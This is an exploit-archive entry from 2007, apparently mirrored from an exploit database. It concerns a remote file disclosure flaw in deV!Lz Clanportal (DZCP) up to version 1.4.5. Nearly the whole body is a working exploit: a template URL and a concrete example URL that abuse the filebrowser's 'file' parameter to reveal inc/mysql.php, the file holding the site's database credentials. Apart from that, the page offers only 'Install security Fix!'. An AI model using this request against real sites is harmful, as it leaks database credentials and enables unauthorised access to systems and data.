deV!Lz Clanportal [DZCP] <= 1.4.5 Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : deV!Lz Clanportal [DZCP] <= 1.4.5 Remote File Disclosure Vulnerability
# Published : 2007-02-21
# Author : Kiba
# Previous Title : Nabopoll 1.2 (result.php surv) Remote Blind SQL Injection Exploit
# Next Title : NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit

# DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable
# Found by: Kiba
# Solution: Install security Fix!
# Exploit:

http://[SITE]/[PATH]/inc/filebrowser/browser.php?file=inc/mysql.php

Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php

# www.Syue.com [2007-02-21]